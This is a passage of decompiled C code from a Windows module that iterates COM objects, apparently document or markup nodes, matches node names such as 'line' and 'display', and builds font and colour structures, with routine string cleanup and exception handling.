				intOrPtr* _t1427;
				intOrPtr _t1431;
				int _t1433;
				signed int _t1441;
				signed int _t1443;
				int _t1453;
				signed int _t1461;
				signed int _t1463;
				signed int _t1465;
				signed int _t1467;
				signed int _t1469;
				signed int _t1471;
				intOrPtr* _t1488;
				intOrPtr* _t1495;
				intOrPtr* _t1503;
				void* _t1510;
				void* _t1511;
				int _t1512;
				signed int _t1526;
				signed int _t1528;
				signed int _t1530;
				signed int _t1532;
				signed int _t1534;
				int _t1541;
				void* _t1542;
				signed int _t1554;
				intOrPtr _t1573;
				intOrPtr* _t1575;
				void* _t1576;
				signed int _t1577;
				signed int _t1578;
				signed int _t1579;
				signed int _t1581;
				void* _t1584;
				int _t1591;
				int _t1592;
				int _t1593;
				signed int _t1596;
				signed int _t1597;
				void* _t1598;
				void* _t1599;
				int _t1600;
				short* _t1602;
				int _t1611;
				intOrPtr* _t1612;
				signed int* _t1614;
				int _t1616;
				int _t1617;
				int _t1619;
				intOrPtr _t1621;
				int _t1622;
				int _t1623;
				int* _t1625;
				int _t1627;
				void* _t1629;
				int _t1631;
				int _t1632;
				int _t1633;
				int _t1634;
				int _t1635;
				int _t1636;
				int _t1637;
				int _t1639;
				int _t1640;
				int _t1641;
				int _t1642;
				int _t1643;
				int _t1644;
				int _t1645;
				int _t1646;
				int _t1647;
				int _t1648;
				void* _t1649;
				int _t1650;
				void* _t1651;
				int _t1652;
				void* _t1653;
				int _t1654;
				int _t1656;
				int _t1657;
				int _t1658;
				int _t1659;
				int _t1660;
				int _t1661;
				int _t1662;
				int _t1663;
				int _t1664;
				void* _t1665;
				int _t1666;
				signed int _t1669;
				signed int _t1670;
				signed int _t1671;
				signed int _t1672;
				signed int _t1674;
				signed int _t1677;
				signed int _t1685;
				signed int _t1686;
				signed int _t1689;
				signed int _t1691;
				void* _t1692;
				signed int _t1695;
				void* _t1697;
				signed int _t1703;
				signed int _t1704;
				long long _t1736;

				_t1736 = __fp0;
				_t1602 = __edi;
				_t1572 = __edx;
				_t1669 = _t1685;
				_push(0xffffffff);
				_push(E6E808D28);
				_push( *[fs:0x0]);
				_t1686 = _t1685 - 0x54;
				_t781 =  *0x6e81e008; // 0x77dcee0d
				_t782 = _t781 ^ _t1669;
				_v20 = _t782;
				_push(__ebx);
				_push(_t1611);
				_push(__edi);
				_push(_t782);
				 *[fs:0x0] =  &_v16;
				_t1360 = __edx;
				_v24 = 0;
				_v8 = 0;
				_t1382 =  *((intOrPtr*)(__ecx));
				if(_t1382 == 0) {
					L35:
					E6E7E7D20(0x80004003);
					goto L36;
				} else {
					_t1572 =  &_v24;
					_v8 = 0;
					_v24 = 0;
					 *((intOrPtr*)( *_t1382 + 0x34))(_t1382,  &_v24);
					_t1324 = _v24;
					if(_t1324 == 0) {
						L28:
						goto L29;
					} else {
						_t1602 = __imp__#6;
						while(1) {
							_v32 = 0;
							_v8 = 2;
							if(_t1324 == 0) {
								goto L35;
							}
							_t1572 =  &_v32;
							_push( &_v32);
							_push(_t1324);
							if( *((intOrPtr*)( *_t1324 + 0x1c))() < 0) {
								L34:
								 *_t1602(_v32);
								_t1324 = _v24;
								L29:
								_v8 = 0xd;
								if(_t1324 != 0) {
									 *((intOrPtr*)( *_t1324 + 8))(_t1324);
								}
								 *[fs:0x0] = _v16;
								return E6E7E440A(_v20 ^ _t1669);
							} else {
								_t1330 = MultiByteToWideChar(3, 0, "line", 0xffffffff, 0, 0);
								_t1611 = _t1330;
								_t14 = _t1611 - 1; // -1
								_t1382 = _t14;
								__imp__#4(0, _t1382);
								_t1602 = _t1330;
								if(_t1602 == 0) {
									L37:
									E6E7D81D0(0x8007000e);
									goto L38;
								} else {
									_t1331 = MultiByteToWideChar(3, 0, "line", 0xffffffff, _t1602, _t1611);
									if(_t1331 != _t1611) {
										L36:
										__imp__#6(_t1602);
										goto L37;
									} else {
										if(_t1602 == 0) {
											goto L37;
										} else {
											__imp__#314(_v32, _t1602, 0x400, 0);
											_t1602 = __imp__#6;
											_t1611 = _t1331;
											 *_t1602(_t1602);
											if(_t1611 != 1) {
												L18:
												_v28 = 0;
												_v8 = 6;
												_t1333 = _v24;
												if(_t1333 == 0) {
													goto L35;
												} else {
													_t1382 =  *_t1333;
													_t1572 =  &_v28;
													_v8 = 6;
													_push( &_v28);
													_push(_t1333);
													_v28 = 0;
													if( *((intOrPtr*)(_t1382 + 0x40))() < 0) {
														_v8 = 8;
														_t1335 = _v28;
														__eflags = _t1335;
														if(_t1335 != 0) {
															 *((intOrPtr*)( *_t1335 + 8))(_t1335);
														}
														goto L34;
													} else {
														_t1611 = _v24;
														_t1337 = _v28;
														if(_t1611 != _t1337) {
															_v24 = _t1337;
															_v8 = 0xb;
															if(_t1337 != 0) {
																_t1382 =  *_t1337;
																 *((intOrPtr*)(_t1382 + 4))(_t1337);
																_t1337 = _v28;
															}
															_v8 = 0xa;
															if(_t1611 != 0) {
																 *((intOrPtr*)( *_t1611 + 8))(_t1611);
																_t1337 = _v28;
															}
														}
														_v8 = 0xc;
														if(_t1337 != 0) {
															_t1382 =  *_t1337;
															 *((intOrPtr*)(_t1382 + 8))(_t1337);
														}
														 *_t1602(_v32);
														_t1324 = _v24;
														if(_t1324 != 0) {
															continue;
														} else {
															goto L28;
														}
													}
												}
											} else {
												_push(5);
												_v76 = 0;
												_v72 = 7;
												_v92 = 0;
												_t1344 = E6E7DBC80(_t1360,  &_v92, _t1602, _t1611, _t1736, L"Arial");
												asm("movsd xmm0, [0x6e8185a0]");
												_v68 = _t1611;
												_v64 = 0xffffff;
												asm("movsd [ebp-0x38], xmm0");
												_v52 = 0;
												_v48 = 0;
												_v44 = 0;
												_v8 = 4;
												L53();
												if(_t1344 != 0) {
													_t1611 =  *(_t1360 + 4);
													_push( &_v92);
													if( *((intOrPtr*)(_t1360 + 8)) == _t1611) {
														_push(_t1611);
														E6E7DC380(_t1360, _t1736);
													} else {
														_v96 = _t1611;
														E6E7DCCA0(_t1611);
														 *((char*)(_t1611 + 0x18)) = _v68;
														 *((char*)(_t1611 + 0x19)) = _v67;
														 *((intOrPtr*)(_t1611 + 0x1c)) = _v64;
														asm("movsd xmm0, [ebp-0x38]");
														asm("movsd [esi+0x20], xmm0");
														_v8 = 5;
														E6E7DCB10(_t1611 + 0x28, _t1736,  &_v52);
														 *(_t1360 + 4) =  *(_t1360 + 4) + 0x38;
													}
												}
												_t1382 =  &_v52;
												_v8 = 2;
												E6E7DBC00(_t1360, _t1382, _t1602, _t1611, _t1736);
												_t1572 = _v72;
												if(_t1572 < 8) {
													L17:
													_v76 = 0;
													_v72 = 7;
													_v92 = 0;
													goto L18;
												} else {
													_t1382 = _v92;
													_t1572 = 2 + _t1572 * 2;
													_t1347 = _t1382;
													if(_t1572 < 0x1000) {
														L16:
														_push(_t1572);
														E6E7E441B(_t1382);
														_t1686 = _t1686 + 8;
														goto L17;
													} else {
														_t1382 =  *((intOrPtr*)(_t1382 - 4));
														_t1572 = _t1572 + 0x23;
														if(_t1347 - _t1382 + 0xfffffffc > 0x1f) {
															L38:
															E6E7EE5E6(_t1360, _t1382, _t1572, _t1602, __eflags);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t1611);
															_t1612 = _t1382;
															E6E7DBC00(_t1360, _t1612 + 0x28, _t1602, _t1612, _t1736);
															_t1384 =  *(_t1612 + 0x14);
															__eflags = _t1384 - 8;
															if(_t1384 < 8) {
																L44:
																 *(_t1612 + 0x10) = 0;
																__eflags = 0;
																 *(_t1612 + 0x14) = 7;
																 *_t1612 = 0;
																return 0;
															} else {
																_t789 =  *_t1612;
																_t1385 = 2 + _t1384 * 2;
																__eflags = _t1385 - 0x1000;
																if(_t1385 < 0x1000) {
																	L43:
																	_push(_t1385);
																	E6E7E441B(_t789);
																	goto L44;
																} else {
																	_t1573 =  *((intOrPtr*)(_t789 - 4));
																	_t1385 =  &(_t1385[8]);
																	__eflags = _t789 - _t1573 + 0xfffffffc - 0x1f;
																	if(__eflags > 0) {
																		E6E7EE5E6(_t1360, _t1385, _t1573, _t1602, __eflags);
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		_push(_t1612);
																		_t1614 = _t1385;
																		_t1386 = _t1614[5];
																		__eflags = _t1386 - 8;
																		if(_t1386 < 8) {
																			L51:
																			_t1614[4] = 0;
																			__eflags = 0;
																			_t1614[5] = 7;
																			 *_t1614 = 0;
																			return 0;
																		} else {
																			_t795 =  *_t1614;
																			_t1387 = 2 + _t1386 * 2;
																			__eflags = _t1387 - 0x1000;
																			if(_t1387 < 0x1000) {
																				L50:
																				_push(_t1387);
																				E6E7E441B(_t795);
																				goto L51;
																			} else {
																				_t1574 =  *(_t795 - 4);
																				_t1387 = _t1387 + 0x23;
																				__eflags = _t795 - _t1574 + 0xfffffffc - 0x1f;
																				if(__eflags > 0) {
																					E6E7EE5E6(_t1360, _t1387, _t1574, _t1602, __eflags);
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					_push(_t1669);
																					_t1670 = _t1686;
																					_push(0xffffffff);
																					_push(E6E808DCA);
																					_push( *[fs:0x0]);
																					_t1689 = _t1686 - 0xd4;
																					_t801 =  *0x6e81e008; // 0x77dcee0d
																					_t802 = _t801 ^ _t1670;
																					_v144 = _t802;
																					_push(_t1360);
																					_push(_t1614);
																					_push(_t1602);
																					_push(_t802);
																					 *[fs:0x0] =  &_v140;
																					_v300 = _t1574;
																					_t804 = _t1387;
																					_v348 = _t804;
																					_v164 = 0;
																					_v132 = 0;
																					_t1616 =  *_t804;
																					__eflags = _t1616;
																					if(_t1616 == 0) {
																						L234:
																						E6E7E7D20(0x80004003);
																						goto L235;
																					} else {
																						_t1387 =  &_v44;
																						_v12 = 0;
																						_v44 = 0;
																						_t1156 =  *((intOrPtr*)( *_t1616 + 0x44))(_t1616, _t1387);
																						__eflags = _t1156;
																						if(_t1156 < 0) {
																							L230:
																							__eflags = 0;
																							goto L231;
																						} else {
																							_t1160 = _v44;
																							__eflags = _t1160;
																							if(_t1160 == 0) {
																								L235:
																								_t806 = E6E7E7D20(0x80004003);
																								goto L236;
																							} else {
																								_t1387 =  *_t1160;
																								_t1574 =  &_v48;
																								_t1161 =  *((intOrPtr*)(_t1387 + 0x2c))(_t1160,  &_v48);
																								__eflags = _t1161;
																								if(_t1161 < 0) {
																									goto L230;
																								} else {
																									_t1162 = 0;
																									_v40 = 0;
																									_v12 = 4;
																									_t1360 = __imp__#6;
																									_v184 = 0;
																									__eflags = _v48;
																									if(_v48 <= 0) {
																										L188:
																										_v32 = 0;
																										_v12 = 0x11;
																										_t1387 =  *_v228;
																										__eflags = _t1387;
																										if(_t1387 == 0) {
																											goto L237;
																										} else {
																											_t1574 =  &_v32;
																											_v12 = 0x11;
																											_v32 = 0;
																											 *((intOrPtr*)( *_t1387 + 0x34))(_t1387,  &_v32);
																											_t1165 = _v32;
																											__eflags = _t1165;
																											if(_t1165 == 0) {
																												L222:
																												goto L223;
																											} else {
																												while(1) {
																													_v36 = 0;
																													_v12 = 0x13;
																													__eflags = _t1165;
																													if(_t1165 == 0) {
																														goto L234;
																													}
																													_t1574 =  &_v36;
																													_t1169 =  *((intOrPtr*)( *_t1165 + 0x1c))(_t1165,  &_v36);
																													__eflags = _t1169;
																													if(_t1169 < 0) {
																														L229:
																														 *_t1360(_v36);
																														_t1165 = _v32;
																														L223:
																														_v12 = 0x23;
																														__eflags = _t1165;
																														if(_t1165 != 0) {
																															 *((intOrPtr*)( *_t1165 + 8))(_t1165);
																														}
																														goto L225;
																													} else {
																														_t1171 = MultiByteToWideChar(3, 0, "display", 0xffffffff, 0, 0);
																														_t1616 = _t1171;
																														_t244 = _t1616 - 1; // -1
																														_t1387 = _t244;
																														__imp__#4(0, _t1387);
																														_t1602 = _t1171;
																														__eflags = _t1602;
																														if(_t1602 == 0) {
																															goto L239;
																														} else {
																															_t1172 = MultiByteToWideChar(3, 0, "display", 0xffffffff, _t1602, _t1616);
																															__eflags = _t1172 - _t1616;
																															if(_t1172 != _t1616) {
																																goto L238;
																															} else {
																																__eflags = _t1602;
																																if(_t1602 == 0) {
																																	goto L239;
																																} else {
																																	__imp__#314(_v36, _t1602, 0x400, 0);
																																	_t1616 = _t1172;
																																	 *_t1360(_t1602);
																																	__eflags = _t1616 - 1;
																																	if(_t1616 != 1) {
																																		L212:
																																		_v28 = 0;
																																		_v12 = 0x1a;
																																		_t1174 = _v32;
																																		__eflags = _t1174;
																																		if(_t1174 == 0) {
																																			goto L234;
																																		} else {
																																			_t1387 =  *_t1174;
																																			_t1574 =  &_v28;
																																			_v12 = 0x1a;
																																			_v28 = 0;
																																			_t1175 =  *((intOrPtr*)(_t1387 + 0x40))(_t1174,  &_v28);
																																			__eflags = _t1175;
																																			if(_t1175 < 0) {
																																				_v12 = 0x1c;
																																				_t1176 = _v28;
																																				__eflags = _t1176;
																																				if(_t1176 != 0) {
																																					 *((intOrPtr*)( *_t1176 + 8))(_t1176);
																																				}
																																				goto L229;
																																			} else {
																																				_t1616 = _v32;
																																				_t1178 = _v28;
																																				__eflags = _t1616 - _t1178;
																																				if(_t1616 != _t1178) {
																																					_v32 = _t1178;
																																					_v12 = 0x21;
																																					__eflags = _t1178;
																																					if(_t1178 != 0) {
																																						_t1387 =  *_t1178;
																																						 *((intOrPtr*)(_t1387 + 4))(_t1178);
																																						_t1178 = _v28;
																																					}
																																					_v12 = 0x20;
																																					__eflags = _t1616;
																																					if(_t1616 != 0) {
																																						 *((intOrPtr*)( *_t1616 + 8))(_t1616);
																																						_t1178 = _v28;
																																					}
																																				}
																																				_v12 = 0x22;
																																				__eflags = _t1178;
																																				if(_t1178 != 0) {
																																					_t1387 =  *_t1178;
																																					 *((intOrPtr*)(_t1387 + 8))(_t1178);
																																				}
																																				 *_t1360(_v36);
																																				_t1165 = _v32;
																																				__eflags = _t1165;
																																				if(_t1165 != 0) {
																																					continue;
																																				} else {
																																					goto L222;
																																				}
																																			}
																																		}
																																	} else {
																																		_v136 = 0;
																																		asm("xorps xmm0, xmm0");
																																		_v132 = 7;
																																		_v152 = 0;
																																		_v112 = 0;
																																		_v108 = 7;
																																		_v128 = 0;
																																		_v88 = 0;
																																		_v84 = 7;
																																		_v104 = 0;
																																		_v80 = 0;
																																		_v76 = 0;
																																		asm("movsd [ebp-0x40], xmm0");
																																		_v12 = 0x17;
																																		_t1387 =  &_v32;
																																		L258();
																																		__eflags = 0;
																																		if(0 != 0) {
																																			_t1602 = _v180;
																																			_push( &_v152);
																																			_t1616 = _t1602[0x16];
																																			__eflags = _t1602[0x18] - _t1616;
																																			if(_t1602[0x18] == _t1616) {
																																				_t1387 =  &(_t1602[0x14]);
																																				E6E7DC5E0(_t1387, _t1736, _t1616);
																																			} else {
																																				_v176 = _t1616;
																																				E6E7DCCA0(_t1616);
																																				_v12 = 0x18;
																																				E6E7DCCA0(_t1616 + 0x18,  &_v128);
																																				_v12 = 0x19;
																																				_t1387 = _t1616 + 0x30;
																																				E6E7DCCA0(_t1387,  &_v104);
																																				asm("movsd xmm0, [ebp-0x40]");
																																				 *((intOrPtr*)(_t1616 + 0x48)) = _v80;
																																				 *((intOrPtr*)(_t1616 + 0x4c)) = _v76;
																																				asm("movsd [esi+0x50], xmm0");
																																				_t1602[0x16] = _t1602[0x16] + 0x58;
																																			}
																																		}
																																		_v12 = 0x13;
																																		_t1596 = _v84;
																																		__eflags = _t1596 - 8;
																																		if(_t1596 < 8) {
																																			L204:
																																			_t1597 = _v108;
																																			__eflags = _t1597 - 8;
																																			if(_t1597 < 8) {
																																				L208:
																																				_t1574 = _v132;
																																				__eflags = _t1574 - 8;
																																				if(_t1574 < 8) {
																																					goto L212;
																																				} else {
																																					_t1387 = _v152;
																																					_t1574 = 2 + _t1574 * 2;
																																					_t1185 = _t1387;
																																					__eflags = _t1574 - 0x1000;
																																					if(_t1574 < 0x1000) {
																																						L211:
																																						_push(_t1574);
																																						E6E7E441B(_t1387);
																																						_t1689 = _t1689 + 8;
																																						goto L212;
																																					} else {
																																						_t1387 =  *(_t1387 - 4);
																																						_t1574 = _t1574 + 0x23;
																																						__eflags = _t1185 - _t1387 + 0xfffffffc - 0x1f;
																																						if(__eflags > 0) {
																																							goto L240;
																																						} else {
																																							goto L211;
																																						}
																																					}
																																				}
																																			} else {
																																				_t1387 = _v128;
																																				_t1598 = 2 + _t1597 * 2;
																																				_t1189 = _t1387;
																																				__eflags = _t1598 - 0x1000;
																																				if(_t1598 < 0x1000) {
																																					L207:
																																					_push(_t1598);
																																					E6E7E441B(_t1387);
																																					_t1689 = _t1689 + 8;
																																					goto L208;
																																				} else {
																																					_t1387 =  *(_t1387 - 4);
																																					_t1574 = _t1598 + 0x23;
																																					__eflags = _t1189 - _t1387 + 0xfffffffc - 0x1f;
																																					if(__eflags > 0) {
																																						goto L240;
																																					} else {
																																						goto L207;
																																					}
																																				}
																																			}
																																		} else {
																																			_t1387 = _v104;
																																			_t1599 = 2 + _t1596 * 2;
																																			_t1193 = _t1387;
																																			__eflags = _t1599 - 0x1000;
																																			if(_t1599 < 0x1000) {
																																				L203:
																																				_push(_t1599);
																																				E6E7E441B(_t1387);
																																				_t1689 = _t1689 + 8;
																																				goto L204;
																																			} else {
																																				_t1387 =  *(_t1387 - 4);
																																				_t1574 = _t1599 + 0x23;
																																				__eflags = _t1193 - _t1387 + 0xfffffffc - 0x1f;
																																				if(__eflags > 0) {
																																					goto L240;
																																				} else {
																																					goto L203;
																																				}
																																			}
																																		}
																																	}
																																}
																															}
																														}
																													}
																													goto L600;
																												}
																												goto L234;
																											}
																										}
																									} else {
																										while(1) {
																											_t1616 = _v44;
																											__eflags = _t1616;
																											if(_t1616 == 0) {
																												goto L234;
																											} else {
																												_t1387 =  *_t1616;
																												_t1602 =  *(_t1387 + 0x28);
																												_v12 = 5;
																												__eflags = _t1162;
																												if(_t1162 != 0) {
																													_t1387 =  *_t1162;
																													 *((intOrPtr*)(_t1387 + 8))(_t1162);
																												}
																											}
																											_v12 = 4;
																											_v40 = 0;
																											_t1207 =  *_t1602(_t1616, _v184,  &_v40);
																											__eflags = _t1207;
																											if(_t1207 < 0) {
																												L187:
																												L225:
																												_v12 = 0x24;
																												_t1166 = _v40;
																												__eflags = _t1166;
																												if(_t1166 != 0) {
																													 *((intOrPtr*)( *_t1166 + 8))(_t1166);
																												}
																												L231:
																												_v12 = 0x25;
																												_t1512 = _v44;
																												__eflags = _t1512;
																												if(_t1512 != 0) {
																													 *((intOrPtr*)( *_t1512 + 8))(_t1512);
																												}
																												 *[fs:0x0] = _v20;
																												__eflags = _v24 ^ _t1670;
																												return E6E7E440A(_v24 ^ _t1670);
																											} else {
																												_v36 = 0;
																												_v12 = 8;
																												_t1208 = _v40;
																												__eflags = _t1208;
																												if(_t1208 == 0) {
																													goto L234;
																												} else {
																													_t1387 =  *_t1208;
																													_t1574 =  &_v36;
																													_t1209 =  *((intOrPtr*)(_t1387 + 0x1c))(_t1208,  &_v36);
																													__eflags = _t1209;
																													if(_t1209 < 0) {
																														L186:
																														 *_t1360(_v36);
																														goto L187;
																													} else {
																														_t1211 = _v40;
																														__eflags = _t1211;
																														if(_t1211 == 0) {
																															goto L234;
																														} else {
																															_t1574 =  &_v168;
																															__eflags =  *((intOrPtr*)( *_t1211 + 0x20))(_t1211,  &_v168);
																															if(__eflags < 0) {
																																goto L186;
																															} else {
																																_t1387 =  &_v28;
																																_v28 = 0;
																																E6E7D8390(_t1387,  &_v168, __eflags, _v36);
																																_v12 = 0xd;
																																__imp__#8( &_v64);
																																_t806 =  &_v64;
																																__imp__#10(_t806,  &_v168);
																																__eflags = _t806;
																																if(__eflags < 0) {
																																	L236:
																																	E6E7E7D20(_t806);
																																	L237:
																																	E6E7E7D20(0x80004003);
																																	L238:
																																	 *_t1360(_t1602);
																																	L239:
																																	E6E7D81D0(0x8007000e);
																																	L240:
																																	E6E7EE5E6(_t1360, _t1387, _t1574, _t1602, __eflags);
																																	asm("int3");
																																	asm("int3");
																																	asm("int3");
																																	_push(_t1616);
																																	_t1617 = _t1387;
																																	_t1388 =  *(_t1617 + 0x44);
																																	__eflags = _t1388 - 8;
																																	if(_t1388 < 8) {
																																		L246:
																																		 *(_t1617 + 0x40) = 0;
																																		 *(_t1617 + 0x44) = 7;
																																		 *((short*)(_t1617 + 0x30)) = 0;
																																		_t1389 =  *(_t1617 + 0x2c);
																																		__eflags = _t1389 - 8;
																																		if(_t1389 < 8) {
																																			L251:
																																			 *(_t1617 + 0x28) = 0;
																																			 *(_t1617 + 0x2c) = 7;
																																			 *((short*)(_t1617 + 0x18)) = 0;
																																			_t1390 =  *(_t1617 + 0x14);
																																			__eflags = _t1390 - 8;
																																			if(_t1390 < 8) {
																																				L256:
																																				 *(_t1617 + 0x10) = 0;
																																				__eflags = 0;
																																				 *(_t1617 + 0x14) = 7;
																																				 *_t1617 = 0;
																																				return 0;
																																			} else {
																																				_t815 =  *_t1617;
																																				_t1391 = 2 + _t1390 * 2;
																																				__eflags = _t1391 - 0x1000;
																																				if(_t1391 < 0x1000) {
																																					L255:
																																					_push(_t1391);
																																					E6E7E441B(_t815);
																																					goto L256;
																																				} else {
																																					_t1575 =  *((intOrPtr*)(_t815 - 4));
																																					_t1391 =  &(_t1391[8]);
																																					__eflags = _t815 - _t1575 + 0xfffffffc - 0x1f;
																																					if(__eflags > 0) {
																																						goto L257;
																																					} else {
																																						_t815 = _t1575;
																																						goto L255;
																																					}
																																				}
																																			}
																																		} else {
																																			_t1147 =  *((intOrPtr*)(_t1617 + 0x18));
																																			_t1510 = 2 + _t1389 * 2;
																																			__eflags = _t1510 - 0x1000;
																																			if(_t1510 < 0x1000) {
																																				L250:
																																				_push(_t1510);
																																				E6E7E441B(_t1147);
																																				_t1689 = _t1689 + 8;
																																				goto L251;
																																			} else {
																																				_t1575 =  *((intOrPtr*)(_t1147 - 4));
																																				_t1391 = _t1510 + 0x23;
																																				__eflags = _t1147 - _t1575 + 0xfffffffc - 0x1f;
																																				if(__eflags > 0) {
																																					goto L257;
																																				} else {
																																					_t1147 = _t1575;
																																					goto L250;
																																				}
																																			}
																																		}
																																	} else {
																																		_t1151 =  *((intOrPtr*)(_t1617 + 0x30));
																																		_t1511 = 2 + _t1388 * 2;
																																		__eflags = _t1511 - 0x1000;
																																		if(_t1511 < 0x1000) {
																																			L245:
																																			_push(_t1511);
																																			E6E7E441B(_t1151);
																																			_t1689 = _t1689 + 8;
																																			goto L246;
																																		} else {
																																			_t1575 =  *((intOrPtr*)(_t1151 - 4));
																																			_t1391 = _t1511 + 0x23;
																																			__eflags = _t1151 - _t1575 + 0xfffffffc - 0x1f;
																																			if(__eflags > 0) {
																																				L257:
																																				E6E7EE5E6(_t1360, _t1391, _t1575, _t1602, __eflags);
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				asm("int3");
																																				_push(_t1670);
																																				_t1671 = _t1689;
																																				_push(0xffffffff);
																																				_push(E6E808E5B);
																																				_push( *[fs:0x0]);
																																				_t1691 = _t1689 - 0x7c;
																																				_t821 =  *0x6e81e008; // 0x77dcee0d
																																				_t822 = _t821 ^ _t1671;
																																				_v400 = _t822;
																																				_push(_t1360);
																																				_push(_t1617);
																																				_push(_t1602);
																																				_push(_t822);
																																				 *[fs:0x0] =  &_v396;
																																				_v464 = _t1575;
																																				_v412 = 0;
																																				_v388 = 0;
																																				_t1392 =  *_t1391;
																																				__eflags = _t1392;
																																				if(_t1392 == 0) {
																																					L420:
																																					E6E7E7D20(0x80004003);
																																					goto L421;
																																				} else {
																																					_t1575 =  &_v40;
																																					_v16 = 0;
																																					_v40 = 0;
																																					_t1010 =  *((intOrPtr*)( *_t1392 + 0x44))(_t1392, _t1575);
																																					__eflags = _t1010;
																																					if(_t1010 < 0) {
																																						L416:
																																						__eflags = 0;
																																						goto L417;
																																					} else {
																																						_t1014 = _v40;
																																						__eflags = _t1014;
																																						if(_t1014 == 0) {
																																							L421:
																																							_t825 = E6E7E7D20(0x80004003);
																																							goto L422;
																																						} else {
																																							_t1392 =  *_t1014;
																																							_t1575 =  &_v48;
																																							_t1015 =  *((intOrPtr*)(_t1392 + 0x2c))(_t1014, _t1575);
																																							__eflags = _t1015;
																																							if(_t1015 < 0) {
																																								goto L416;
																																							} else {
																																								_t1016 = 0;
																																								_v36 = 0;
																																								_v16 = 4;
																																								_v96 = 0;
																																								__eflags = _v48;
																																								if(_v48 <= 0) {
																																									L411:
																																									goto L412;
																																								} else {
																																									_t1360 = __imp__#6;
																																									while(1) {
																																										_t1617 = _v40;
																																										__eflags = _t1617;
																																										if(_t1617 == 0) {
																																											goto L420;
																																										}
																																										_t1392 =  *_t1617;
																																										_t1602 =  *(_t1392 + 0x28);
																																										_v16 = 5;
																																										__eflags = _t1016;
																																										if(_t1016 != 0) {
																																											_t1392 =  *_t1016;
																																											 *((intOrPtr*)(_t1392 + 8))(_t1016);
																																										}
																																										_v16 = 4;
																																										_v36 = 0;
																																										_t1019 =  *_t1602(_t1617, _v96,  &_v36);
																																										__eflags = _t1019;
																																										if(_t1019 < 0) {
																																											L415:
																																											_t1016 = _v36;
																																											L412:
																																											_v16 = 0x15;
																																											__eflags = _t1016;
																																											if(_t1016 != 0) {
																																												 *((intOrPtr*)( *_t1016 + 8))(_t1016);
																																											}
																																											L417:
																																											_v16 = 0x16;
																																											_t1453 = _v40;
																																											__eflags = _t1453;
																																											if(_t1453 != 0) {
																																												 *((intOrPtr*)( *_t1453 + 8))(_t1453);
																																											}
																																											 *[fs:0x0] = _v24;
																																											__eflags = _v28 ^ _t1671;
																																											return E6E7E440A(_v28 ^ _t1671);
																																										} else {
																																											_v44 = 0;
																																											_v16 = 8;
																																											_t1020 = _v36;
																																											__eflags = _t1020;
																																											if(_t1020 == 0) {
																																												goto L420;
																																											} else {
																																												_t1392 =  *_t1020;
																																												_t1575 =  &_v44;
																																												_t1021 =  *((intOrPtr*)(_t1392 + 0x1c))(_t1020, _t1575);
																																												__eflags = _t1021;
																																												if(_t1021 < 0) {
																																													L414:
																																													 *_t1360(_v44);
																																													goto L415;
																																												} else {
																																													_t1023 = _v36;
																																													__eflags = _t1023;
																																													if(_t1023 == 0) {
																																														goto L420;
																																													} else {
																																														_t1575 =  &_v84;
																																														__eflags =  *((intOrPtr*)( *_t1023 + 0x20))(_t1023, _t1575);
																																														if(__eflags < 0) {
																																															goto L414;
																																														} else {
																																															_t1392 =  &_v32;
																																															_v32 = 0;
																																															E6E7D8390(_t1392, _t1575, __eflags, _v44);
																																															_v16 = 0xd;
																																															__imp__#8( &_v68);
																																															_t825 =  &_v68;
																																															__imp__#10(_t825,  &_v84);
																																															__eflags = _t825;
																																															if(__eflags < 0) {
																																																L422:
																																																E6E7E7D20(_t825);
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																asm("int3");
																																																_push(_t1671);
																																																_t1672 = _t1691;
																																																_push(0xffffffff);
																																																_push(E6E808EC8);
																																																_push( *[fs:0x0]);
																																																_t1692 = _t1691 - 0x5c;
																																																_t828 =  *0x6e81e008; // 0x77dcee0d
																																																_t829 = _t828 ^ _t1672;
																																																_v556 = _t829;
																																																_push(_t1360);
																																																_push(_t1617);
																																																_push(_t1602);
																																																_push(_t829);
																																																 *[fs:0x0] =  &_v552;
																																																_v636 = _t1575;
																																																_v564 = 0;
																																																_v544 = 0;
																																																_t1393 =  *_t1392;
																																																__eflags = _t1393;
																																																if(_t1393 == 0) {
																																																	L502:
																																																	E6E7E7D20(0x80004003);
																																																	goto L503;
																																																} else {
																																																	_v20 = 0;
																																																	_v40 = 0;
																																																	_t945 =  *((intOrPtr*)( *_t1393 + 0x44))(_t1393,  &_v40);
																																																	__eflags = _t945;
																																																	if(_t945 < 0) {
																																																		L498:
																																																		__eflags = 0;
																																																		goto L499;
																																																	} else {
																																																		_t949 = _v40;
																																																		__eflags = _t949;
																																																		if(_t949 == 0) {
																																																			L503:
																																																			_t832 = E6E7E7D20(0x80004003);
																																																			goto L504;
																																																		} else {
																																																			_t1393 =  *_t949;
																																																			_t950 =  *((intOrPtr*)(_t1393 + 0x2c))(_t949,  &_v52);
																																																			__eflags = _t950;
																																																			if(_t950 < 0) {
																																																				goto L498;
																																																			} else {
																																																				_t951 = 0;
																																																				_v36 = 0;
																																																				_v20 = 4;
																																																				_v96 = 0;
																																																				__eflags = _v52;
																																																				if(_v52 <= 0) {
																																																					L493:
																																																					goto L494;
																																																				} else {
																																																					_t1360 = __imp__#6;
																																																					while(1) {
																																																						_t1617 = _v40;
																																																						__eflags = _t1617;
																																																						if(_t1617 == 0) {
																																																							goto L502;
																																																						}
																																																						_t1393 =  *_t1617;
																																																						_t1602 =  *(_t1393 + 0x28);
																																																						_v20 = 5;
																																																						__eflags = _t951;
																																																						if(_t951 != 0) {
																																																							_t1393 =  *_t951;
																																																							 *((intOrPtr*)(_t1393 + 8))(_t951);
																																																						}
																																																						_v20 = 4;
																																																						_v36 = 0;
																																																						_t954 =  *_t1602(_t1617, _v96,  &_v36);
																																																						__eflags = _t954;
																																																						if(_t954 < 0) {
